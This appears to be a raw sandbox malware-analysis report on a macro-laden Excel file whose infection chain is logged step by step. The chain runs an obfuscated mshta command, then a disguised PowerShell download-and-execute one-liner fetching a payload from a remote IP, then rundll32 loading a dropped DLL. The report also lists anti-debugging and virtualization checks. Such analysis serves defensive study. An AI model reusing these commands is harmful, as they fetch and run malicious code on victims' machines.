            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729AFEC08_2_729AFEC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B9EC08_2_729B9EC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729D1F978_2_729D1F97
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A8F708_2_729A8F70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A5CC08_2_729A5CC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 729B4030 appears 47 times
            Source: 36C9.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
            Source: ggnlRjkfr4.xlsMacro extractor: Sheet name: oo
            Source: ggnlRjkfr4.xlsMacro extractor: Sheet name: oo
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: ggnlRjkfr4.xlsOLE indicator, VBA macros: true
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: ggnlRjkfr4.xlsVirustotal: Detection: 11%
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K......8.o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................$k....................................}..v....`.......0...............................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................$k..... ..............................}..v............0...............8.o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................$k....................................}..v....0.......0...............................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................$k......o.............................}..v............0.................o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................$k....................................}..v.....+......0...............................................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................$k......o.............................}..v....x,......0...............H.o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............4.$k....E...............................}..v............0.................o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............4.$k....E...............................}..v............0.................o.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............(.......:.......................Jump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.html
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.htmlJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://87.251.86.178/pp/oo.htmlJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssdJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerJump to behavior
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD529.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@13/8@2/35
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A58B0 CoCreateInstance,OleRun,CoCreateInstance,8_2_729A58B0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: ggnlRjkfr4.xlsOLE indicator, Workbook stream: true
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A9E80 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,8_2_729A9E80
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: >ystem.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
            Source: 36C9.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            barindex
            Obfuscated command line foundShow sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.htmlJump to behavior
            Source: C:\Windows\System32\mshta.exeCode function: 3_3_037208CC push 8B490309h; iretd 3_3_037208D1
            Source: C:\Windows\System32\mshta.exeCode function: 3_3_037200BF push 8B490309h; iretd 3_3_037200C5
            Source: C:\Windows\System32\mshta.exeCode function: 3_3_037208CC push 8B490309h; iretd 3_3_037208D1
            Source: C:\Windows\System32\mshta.exeCode function: 3_3_037200BF push 8B490309h; iretd 3_3_037200C5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018176C push ebp; iretd 8_2_0018176D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B4209 push ecx; ret 8_2_729B421C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B4080 push ecx; ret 8_2_729B4093
            Source: ssd.dll.5.drStatic PE information: section name: .00cfg
            Source: ssd.dll.5.drStatic PE information: section name: .faxt
            Source: ssd.dll.5.drStatic PE information: section name: .voltbl
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000007299D9AF second address: 000000007299D9D7 instructions: 0x00000000 rdtscp 0x00000003 xor ecx, ecx 0x00000005 mov esi, 00989680h 0x0000000a cmp esi, eax 0x0000000c sbb ecx, edx 0x0000000e mov edi, 021BDE81h 0x00000013 jc 00007FE984B98325h 0x00000015 rdtscp
            Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000007299E622 second address: 000000007299E64D instructions: 0x00000000 rdtscp 0x00000003 mov ecx, 00989680h 0x00000008 cmp ecx, eax 0x0000000a mov eax, 00000000h 0x0000000f sbb eax, edx 0x00000011 mov edi, 0D30C165h 0x00000016 jc 00007FE984BFAE65h 0x00000018 rdtscp
            Source: C:\Windows\System32\mshta.exe TID: 2072Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Windows\System32\mshta.exe TID: 2072Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A0 rdtscp 8_2_7299D9A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CB634 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,8_2_729CB634
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CB581 _free,_free,FindFirstFileExW,_free,8_2_729CB581
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729C070F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_729C070F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B3665 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,8_2_729B3665
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A0 rdtscp 8_2_7299D9A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00191E59 mov eax, dword ptr fs:[00000030h]8_2_00191E59
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A0 mov eax, dword ptr fs:[00000030h]8_2_7299D9A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A0 mov eax, dword ptr fs:[00000030h]8_2_7299D9A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A0 mov ecx, dword ptr fs:[00000030h]8_2_7299D9A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CB17F mov eax, dword ptr fs:[00000030h]8_2_729CB17F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B35F9 mov esi, dword ptr fs:[00000030h]8_2_729B35F9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729BF8CC mov eax, dword ptr fs:[00000030h]8_2_729BF8CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299FC60 mov eax, dword ptr fs:[00000030h]8_2_7299FC60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729C070F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_729C070F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B3D00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_729B3D00
